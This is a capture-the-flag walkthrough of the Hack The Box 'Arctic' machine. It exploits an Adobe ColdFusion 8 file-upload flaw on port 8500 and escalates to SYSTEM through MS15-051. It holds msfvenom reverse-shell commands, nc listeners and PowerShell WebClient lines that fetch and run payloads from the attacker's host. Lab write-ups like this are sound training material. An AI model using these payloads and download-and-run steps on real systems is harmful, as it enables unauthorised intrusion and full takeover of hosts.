HTB: Arctic

...

Intro:

This box was rated a 2.2/5.... Probably because the webserver took a literal 30 seconds to load a page -_-. Anyways, once we understand that port 8500 is a webport the foothold is straightforwards, and we can privesc into system through a kernel-mode driver exploit.

Recon:

Running nmap gives us three ports, two of which are a collective one rabbit hole: nmap -sT -sV -A -v <ip> reveals ports [135,8500,49154]. Port 135 is MSRPC Endpoint Mapper, which tells connecting devices what services are mapped to which port. Port 49154 is in the range of ports that the MSRPC Mapper assigns services to. This is confirmed through enumerating the endpoints using an impacket script "rpcdump.py" [1].

Port 8500 is a non-standard port, so we'll need to do some digging to discover what it is. Nmap says it's possibly running "FMTP", which is warily confirmed by a quick googling. We will come back to this port later.

Hunting the Rabbit:

rpcdump.py returns a lot of information, which I'm dumping here. Sifting through it all, we see that port 49154 is mapped to "Task Scheduler Service Remoting Protocol". Some research on this port shows us that we can possibly execute commands through this service.

rpcdump.py output showing Task Scheduler

After hours of me trying to figure out how to connect to this port, I ultimately accept failure. In most cases this would be quite bad, but I remembered that there is one more port, so I decide to give it another shot. The whole box can't be one huge rabbit hole!

Getting User:

I decide to google the port one more time. Digging aroung brings me to an interesting discovery: Port 8500 is the default web server for Adobe ColdFusion. I typed the url:port into Firefox and after waiting 30 seconds we get a webpage! It's a login page for Adobe ColdFusion. We can try some default credentials with no luck. Exploit time! Doing a bit of googling shows us that we are able to do an arbitrary file upload via a specific POST request. There are two exploits on Exploit DB that we can analyze to achieve the exploit anti-metasploit. One of them is an example POST request, and the other is a metasploit script. I've used the metasploit module as a framework, and the POST example as a guide to understand what exactly the metasploit module is doing (I'm no ruby pro, but it's getting there!).

Metasploit module's payload

We see that the module sends a POST request to "/CFIDE/scripts/ajax/FCKeditor/editor/filemanager/connectors/cfm/upload.cfm", while passing url query parameters: "Command=FileUpload&Type=File&CurrentFolder=/#{page}%00".The #{page} we will replace with whatever we want to name the payload. Something to note is the server will lock up if you try to upload a file with a name that already exists. We are sending a multi-part form which requires a boundary. We set ours to an arbitrary "---647913258". One of the data parts is filled with: form-data; name="newfile"; filename="arbitrary.txt". Checking the other exploit we see that this is the "Content-Disposition" header. Finally, it passes the payload, which we can generate using msfvenom: msfvenom -p windows/x64/shell_reverse_tcp -f jsp LHOST=<your ip> LPORT=3184 > cmd.jsp. I've been unsuccessful with getting a PowerShell reverse shell, so a cmd shell will do for now. One header to be mindful of is the "Content-Length" header, which is the byte-length of the entire body. Our script manages to add some extra bytes to the payload, but is still successful with our reverse shell. I've written this all into a python script [3]. The reply should be a cool "HTTP/1.0 200 OK" and you can verify success by navigating to: http://<target ip>:8500/userfiles/file, where you should see the jsp file we just uploaded. This honestly took waaaay longer to get working than I was hoping, but in the end I got it and now I have a template tool to reference!

A couple test uploads

Once the file is uploaded, start a netcat listener and navigate to the file:
nc -lvp 3184
filepath: http://<target ip>:8500/userfiles/file/cmd.jsp

Get that user flag! type C:\Users\tolis\Desktop\user.txt

Getting Root:

To get root we need to do some vuln enumeration. First, we can get a PowerShell using a oneliner: powershell -Command '<one-liner>' [4]. Start a new netcal listener and now we're running PowerShell baby! Navigate to "C:\Users\tolis\AppData\Local\Temp" so we can download files. We're gonna go with the Sherlock PowerShell script because this is an older machine (Windows Server 2008, no hotfixes). I hadn't had any luck with Invoke-WebRequest, so we manually create an object from which we can download Sherlock:
$WebClient=New-Object System.Net.WebClient
$WebClient.DownloadFile("http://<your ip>/path/to/Sherlock.ps1","C:\Users\tolis\AppData\Local\Temp\"s.ps1")

Run the script, then run Find-AllVulns. This will list all the vulnerabilities that may affect our target. We will go with the MS15-051 exploit.

Sherlock showing us our target is vunlerable to MS15-051

Download the exploit from the SecWiki github [5] and upload it: $WebClient.DownloadFile("http://<your ip","C:\Users\tolis\AppData\Local\Temp\ms.exe"). To confirm it works, we can run .\ms.exe 'whoami' which will return "nt authority/system".

Finally, to get a root shell, we can upload yet another PowerShell reverse shell (courtesy of msfvenom) and listen for it:
msfvenom -p windows/x64/shell_reverse_tcp -f exe LHOST=<your ip> LPORT=3188 > rshl.exe
python -m http.server &
nc -lvp 3188

On the target:
$WebClient.DownloadFile("http://<your ip>:8000/rshl.exe","C:\Users\tolis\AppData\Local\Temp\rshl.exe")
.\ms.exe .\rshl.exe

Yay! We get the connection and have a system shell! type C:\Users\Administrator\Desktop\root.txt for the root flag!

Running our final reverse shell




Resources:

Impacket


rpcdump.txt [FILE]


Adobe ColdFusion 8 AFU


Powershell One-Liner


SecWiki MS15-051 exploit [EXTERNAL]


c